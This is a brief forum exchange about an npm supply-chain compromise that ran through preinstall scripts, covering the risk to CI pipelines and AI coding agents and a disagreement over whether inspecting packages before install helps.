The part that seems most important here is that npm install was enough.
Once the compromise point is preinstall, the usual "inspect after install" mindset breaks down. By then the payload has already had a chance to run.
That gets more interesting with agents / CI / ephemeral sandboxes, because short exposure windows are still enough when installs happen automatically and repeatedly.
Another thing I think is worth paying attention to: this payload did not just target secrets, it also targeted AI tooling config, and there is a real possibility that shell-profile tampering becomes a way to poison what the next coding assistant reads into context.
I work on AgentSH (https://www.agentsh.org), and we wrote up a longer take on that angle here:
Nobody inspects packages after install, your theory has been debunked multiple times, caring about npm install running scripts is moot when you’ll inevitably run the actual binary after install.
And besides, you could always pull the package and inspect before running install, which unless you really know the installer and understand/know guarantees deeply (e.g., whether it’s possible for an install to deploy files outside of node_modules) it’s insane to even vaguely trust it to pull and unpack potentially malicious code.